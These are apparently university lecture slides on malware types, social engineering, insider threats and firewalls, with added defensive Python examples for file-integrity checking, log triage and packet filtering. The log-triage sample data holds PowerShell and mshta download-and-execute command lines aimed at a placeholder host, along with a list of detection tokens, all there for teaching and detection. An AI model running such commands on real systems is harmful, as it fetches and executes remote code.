CS111 Malware
Malware

Learning Outcomes
• Describe the major types of malware
• Explain the characteristics of computer viruses and ransomware
• Describe how social engineering works
• Explain the role of a firewall in protecting a computer system
• Describe the different types of insider threats and hackers
• Discuss best practices against malware attacks and insider
threats

Overview
• Malware
• Malicious intent
• Grayware
• Actors in malware attacks
• Social engineering
• Insiders, hacker
• Prevent malware attacks

Malware
• Any malicious program or code that is harmful to systems
• Virus
• Worms
• Spyware/adware
• Trojan
• Ransomware
• Rootkit
• Keylogger
• Malicious cryptomining
• Exploits

Malware Features and Types
• Infectious:
• Viruses, worms
• Concealment:
• Trojan horses, logic bombs, rootkits
• Malware for stealing information:
• Spyware, keyloggers, screen scrapers
• Malware for profit:
• Dialers, scareware, ransomware
• Malware as platform for other attacks
• Botnets, backdoors (trapdoors)
• Many malware samples combine characteristics of several of these types

Malware (figure)

Malware Infection Growth Rate (figure)
Infectious
Computer Virus
• Requires a host program
• Requires user action to spread from one system to another
• Attaches bits of its own malicious code to other files or replaces
files outright with copies of itself
• Viruses no longer make the headlines they once did, but they still
need to be taken seriously.
Computer Virus
• Attaches itself to a host (often a program) and replicates itself
  • Self-replicating code
  • May be delivered as a self-replicating Trojan horse
  • Alters normal code with an "infected" version
• Operates when the infected code is executed

Virus skeleton (pseudocode):

    if spread_condition then
        for each target file:
            if not infected then alter it to include the virus
    perform malicious action
    execute normal program
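The skeleton above shows the defining trait of a file infector: an executable's bytes change without a legitimate update. The practical check for that is a file-integrity baseline. The following Python example is added here as an illustration and is not part of the original slides; it builds a SHA-256 manifest of a directory, simulates an infection (a stub prepended to one program and a dropped script) in a constructed temporary tree, and reports modified, added and removed files. All paths and file contents are constructed for the demo.

```python
"""File-integrity baseline check: detects the hallmark of a file-infecting
virus, an executable whose bytes changed without a legitimate update."""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every regular file under root (POSIX-style relative path) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            baseline[p.relative_to(root).as_posix()] = sha256_of(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two manifests: changed hashes, new files, and files that vanished."""
    modified = sorted(k for k in baseline if k in current and baseline[k] != current[k])
    added = sorted(k for k in current if k not in baseline)
    removed = sorted(k for k in baseline if k not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo() -> dict:
    """Constructed scenario: two 'programs', then a virus-like rewrite."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "app.exe").write_bytes(b"MZ original program bytes")
        (root / "bin" / "tool.exe").write_bytes(b"MZ another program")
        baseline = build_baseline(root)          # taken while the system is clean

        # Simulate infection: virus code prepended to app.exe (the "alter to
        # include virus" step of the skeleton) plus a dropped script file.
        victim = root / "bin" / "app.exe"
        victim.write_bytes(b"VIRUS-STUB " + victim.read_bytes())
        (root / "bin" / "love-letter.vbs").write_bytes(b"' dropped script (constructed)")

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

The baseline is only as trustworthy as its storage: keep the manifest (or a signature over it) off the monitored host, otherwise a rootkit or virus with write access can simply update it along with the files it infects.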
ILOVEYOU (2000):
• Geographic impact: spread globally within hours, affecting
computers across Asia, Europe and North America; one of the
most widespread infections in history.

• Affected systems: Windows systems, through email clients such
as Microsoft Outlook. It arrived as a VBScript attachment named
LOVE-LETTER-FOR-YOU.TXT.vbs (the .vbs extension hidden by
default) and mailed itself to every Outlook contact, which makes
it technically a mass-mailing worm even though it is usually
called a virus. It overwrote files with certain extensions, such
as .jpg, .vbs and .js, with copies of itself and hid .mp3 files
behind copies of itself.

• Consequences: an estimated $10 billion in damages; it took down
government agencies, corporations and private users' systems,
requiring extensive recovery efforts.
Worm
• Self-replicating malware that does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
• Backdoors, spam relays, DDoS agents; …
• Phases
Probing → Exploitation → Replication → Payload
Concealment
Trojan Horse
• Software that appears to perform a desirable function for the
user prior to running or installing, but (perhaps in addition to the
expected function) steals information or harms the system
• Trojans masquerade as legitimate software, tricking users into
installing them. Once installed they open backdoors or perform
malicious activities.
• Effects: can steal data, install additional malware, or enable
remote access.
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
• E.g., presence/absence of some file; Particular date/time or particular
user
• When triggered, typically damages system
• Modify/delete files/disks
Rootkit
• A rootkit is software that enables continued privileged access to
a computer while actively hiding its presence from administrators
by subverting standard operating system functionality or other
applications.
• The emphasis is on hiding information from the administrator's
view so that the malware is not detected
• E.g., hiding processes, files, open network connections, etc.
Stealing Information
Spyware
• Software that secretly monitors user activities, gathering data
without consent.
• Pegasus (first publicly documented in 2016; major disclosures
again in 2019 and 2021)
• Developed by the NSO Group, Pegasus is one of the most
advanced spyware tools. It can infect iOS and Android devices,
enabling the operator to access contacts, messages, emails,
and even microphone and camera functions without the user's
knowledge.
Keyloggers
• Keyloggers record every keystroke made on a computer,
capturing sensitive information like passwords and credit card
numbers.

• Effects: Compromises accounts and financial data.

• Examples:
• Agent Tesla: A remote-access Trojan that steals credentials.
• Ardamax Keylogger: Used for both legitimate monitoring and
malicious purposes.
Fileless Malware
• Fileless malware runs in memory and avoids writing its own
executable to disk, typically by abusing tools already on the
system (PowerShell, WMI, mshta, regsvr32). Because there is no
malicious file to scan, traditional signature-based antivirus often
misses it.
• "Fileless" does not mean trace-free: persistence usually lives in
the registry, scheduled tasks or WMI subscriptions, and the
command lines and script logs of the abused tools remain the
best detection source.
• Effects: enables stealthy attacks, often used for espionage or
data theft.
• Examples:
  • Astaroth: steals information while running in memory, abusing
  built-in Windows tools.
  • PowerGhost: a cryptojacking malware that mines
  cryptocurrency silently.
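Since fileless malware leaves its footprint in command lines rather than on disk, the practical check is to triage process-creation logs for living-off-the-land patterns, decoding any Base64 `-EncodedCommand` payload so the real script can be inspected. The Python below is an added example, not code from the original slides; the log format (`timestamp|host|user|image|cmdline`), the suspicious-token list, the scoring threshold and the four sample records (including the encoded payload, which is generated in the block) are all constructed for the demonstration.

```python
"""Triage process-creation logs for fileless / living-off-the-land activity."""
import base64
import re

# Tokens typical of fileless tradecraft (constructed list, extend for your environment).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
              "-nop", "-w hidden", "-windowstyle hidden", "wmic", "mshta", "regsvr32")

# PowerShell -EncodedCommand takes Base64 of UTF-16LE text, not of UTF-8.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script of a powershell -enc payload, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmdline: str):
    """Count suspicious indicators in the command line plus its decoded payload."""
    reasons = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
        text = cmdline + " " + decoded
    low = text.lower()
    reasons.extend(tok for tok in SUSPICIOUS if tok in low)
    return len(reasons), reasons


def triage(log_lines, threshold: int = 2):
    """Parse 'ts|host|user|image|cmdline' records; return those scoring >= threshold."""
    hits = []
    for line in log_lines:
        ts, host, user, image, cmdline = line.split("|", 4)
        s, reasons = score(cmdline)
        if s >= threshold:
            hits.append({"ts": ts, "host": host, "user": user, "image": image,
                         "score": s, "reasons": reasons})
    return hits


# Constructed sample input. The encoded payload is built here so the demo is self-contained.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    r"2024-05-01T10:00:01|ws01|alice|C:\Windows\explorer.exe|explorer.exe",
    r"2024-05-01T10:02:17|ws01|alice|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -nop -w hidden -enc " + ENCODED,
    r"2024-05-01T10:05:40|srv02|svc_backup|C:\Windows\System32\wbem\WMIC.exe"
    r'|wmic process call create "mshta http://example.invalid/a.hta"',
    r"2024-05-01T11:00:00|srv02|admin|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

The scoring is deliberately additive rather than a single regex: an administrator's `-ExecutionPolicy Bypass -File backup.ps1` scores zero, while the hidden-window encoded download and the WMIC-spawned mshta both cross the threshold. Decoding the payload is what makes the first one actionable; the Base64 blob alone tells an analyst nothing.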
For Profit
Dialers
• Programs that connect a computer to expensive phone
numbers to generate revenue for the attacker.

Scareware
• Fake security warnings designed to scare users into buying
unnecessary or harmful software.
Ransomware
• Scareware (fake warnings that demand payment)
• Screen lockers (block access to the desktop without touching files)
• Encrypting ransomware (encrypts the victim's files)
Ransomware
• Ransomware encrypts files and demands a ransom payment for
the decryption keys.
• Effects: prevents access to critical files or systems, potentially
halting business operations.
• Examples:
  • Medusa: known for double-extortion tactics, where attackers
  encrypt data on compromised systems and also threaten to
  publicly release it unless a ransom is paid.
  • LockBit: a ransomware-as-a-service operation whose affiliates
  run targeted intrusions.
Platform for other Attacks
Botnet
• A botnet is a network of compromised devices controlled
remotely by an attacker. These devices, or "bots," are used to
carry out large-scale attacks.
• Effects: enables distributed denial-of-service (DDoS) attacks,
spam campaigns, and data breaches.
• Examples:
  • Mirai: compromised IoT devices (largely via default credentials)
  to launch massive DDoS attacks.
  • BredoLab: a botnet used to distribute spam and malware.
Adware
• Adware displays intrusive advertisements and redirects users to
potentially malicious websites.
• Effects: slows down systems and can serve as a gateway for more
harmful malware.
• Examples:
  • Fireball: turned browsers into ad-generating machines, affecting
  millions of devices.
  • Gator: displayed targeted ads by monitoring users' web activity.
Grayware
• Privacy-invasive software
• The term captures the commercial side of unwanted software:
it is usually installed to make money, not to destroy data
• Potentially unwanted program (PUP)
• Unwanted despite having been downloaded by the user, often
bundled with a legitimate installer
• Adware and spyware are the typical examples
Social Engineering
• Hacks people's minds rather than their machines
• A widely quoted industry figure holds that 98% of cyber attacks
involve some social engineering
• Gets the victim to:
  • Give up usernames and passwords
  • Install malware on their device
  • Send money via electronic funds transfer, money order, or gift cards
  • Authorize a malicious software plugin, extension, or third-party app
  • Act as a money mule

IT 6823 – LM7 Malware 29


Human Vulnerabilities for Social Engineering
(Cialdini's six principles of influence)
• Reciprocity
• Scarcity
• Authority
• Consistency
• Liking
• Consensus (social proof)
Types of Social Engineering
• Email phishing
• Trojans (malware disguised as software the victim wants)
• Spear phishing (targeted at a specific person or organization)
• SMS text message phishing (smishing)
• Scam calls (voice phishing, or vishing)
• Tech support scams
Insider Threats
• Malicious insider
• A mole (an outsider who has obtained insider access)
• Careless users
  • The most common insider threat

Insider Threat Behavior (figure)
Hacker
• Purpose of hacking
• Criminal financial gain
• Fame and reputation
• Corporate espionage
• State-sponsored hacking
• Hacktivist

Types of Hacker
• Black hat
These hackers engage in illegal activities, breaching systems to steal
data, spread malware, or cause damage.
• White hat
These hackers use their skills to help organizations strengthen their
cybersecurity. They are usually employed by companies to find
vulnerabilities before malicious hackers can exploit them.
• Gray hat
These hackers fall between white and black hat hackers. They may find
vulnerabilities without permission but do not exploit them for personal
gain. Often, they inform the affected company afterward.

Types of Hacker
• Script Kiddies
These individuals lack deep technical skills and often use pre-made
tools or scripts developed by others to launch attacks. Their motivation
is often for fun or to show off their abilities.
• Hacktivists
• Hackers who use their skills for political or social activism. They hack
into systems to promote a cause, make a statement, or expose
wrongdoing.
• State-Sponsored Hackers
• Hackers employed or funded by a government to conduct cyber
espionage or disrupt the operations of rival nations. These activities
often involve data theft, sabotage, or spreading propaganda.

Types of Hacker
• Red Hat Hackers
• These are like vigilante hackers who target black hat hackers. Instead
of reporting them to authorities, they use their skills to disrupt the
malicious activities of these hackers.
• Blue Hat Hackers
• Hackers invited by organizations to test systems for vulnerabilities but
are not employed as security professionals. Often brought in for
specific projects or bug bounty programs.
• Green Hat Hackers
• These are beginners who are learning to hack. They aspire to become
full-fledged hackers and spend time gaining knowledge from
communities and mentors.

Factors that make a system more vulnerable to
malware
• Security defects in software
• Insecure design or user error
• Over-privileged users and code
• Monoculture: widespread use of the same operating system, so
one exploit works everywhere
Firewall
• Restricts outside access to your computer or network
• Blocks traffic from certain locations, applications or ports
• Allows only relevant and necessary traffic through (default deny)
• Hardware firewall
  • Network firewalls
• Software firewall
  • Built into most operating systems
  • Third-party apps
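The "block certain traffic, allow what is necessary" behaviour is a first-match rule list evaluated against each packet, with a default deny when nothing matches. The Python below is an added example written for this page, not a real firewall product or the slides' own material; the packet fields, the `Rule` matcher and the sample host policy (reply traffic in, HTTPS and DNS out, SSH only from a management subnet) are constructed assumptions. It goes slightly beyond the slide by showing why an outbound (egress) rule matters against malware: a callback to an attacker's port is denied by default even though the host initiated it.

```python
"""Minimal first-match packet filter illustrating a default-deny firewall policy."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional, List


@dataclass(frozen=True)
class Packet:
    direction: str          # "in" or "out" relative to the protected host
    proto: str              # "tcp" or "udp"
    src: str
    dst: str
    dport: int
    established: bool = False   # reply belonging to a connection this host opened


@dataclass(frozen=True)
class Rule:
    action: str                     # "allow" or "deny"
    direction: str = "any"
    proto: str = "any"
    src: str = "0.0.0.0/0"          # CIDR
    dst: str = "0.0.0.0/0"          # CIDR
    dport: Optional[int] = None     # None = any port
    established: Optional[bool] = None  # None = don't care

    def matches(self, p: Packet) -> bool:
        return (self.direction in ("any", p.direction)
                and self.proto in ("any", p.proto)
                and ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.dport is None or self.dport == p.dport)
                and (self.established is None or self.established == p.established))


def evaluate(rules: List[Rule], p: Packet, default: str = "deny") -> str:
    """First matching rule wins; anything unmatched gets the default verdict."""
    for r in rules:
        if r.matches(p):
            return r.action
    return default


# Constructed host policy. Order matters: the established-traffic rule comes first
# so replies are never caught by the later explicit deny.
POLICY = [
    Rule("allow", established=True),
    Rule("allow", "out", "tcp", dport=443),                       # web browsing
    Rule("allow", "out", "udp", dst="10.0.0.53/32", dport=53),    # internal resolver only
    Rule("allow", "in", "tcp", src="10.0.100.0/24", dport=22),    # SSH from management net
    Rule("deny", "in", "tcp", dport=22),                          # explicit, so it can be logged
]


def check(p: Packet) -> str:
    return evaluate(POLICY, p)


if __name__ == "__main__":
    callback = Packet("out", "tcp", "10.0.1.5", "203.0.113.9", 4444)   # malware C2 beacon
    print("C2 callback:", check(callback))
```

Two things the example makes visible: rule order (swap the first and last rules and SSH replies die), and the value of egress filtering, since the default deny on outbound traffic is what stops a Trojan's reverse connection to 203.0.113.9:4444 while normal HTTPS still flows.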
Best Practices against Malware Attacks
• Continuous user education
• Use reputable anti-malware software and keep it updated
• Keep the network secure (segmentation, firewalling, patching)
• Perform regular website security audits
  • Scan your organization's websites regularly for
  vulnerabilities
• Create regular, verified backups kept offline or otherwise out of
reach of ransomware
Protect Against an Insider Attack
• Protect critical assets
• Enforce policies
• Increase visibility
• Promote culture changes

Insider Threat Detection Solutions
• Insiders already know the security measures, so no single control
is enough
• Combine several tools
• Machine learning tools for analyzing data streams and prioritizing alerts
• Behavior analytics (flag deviations from a user's normal activity)
• Database activity monitoring
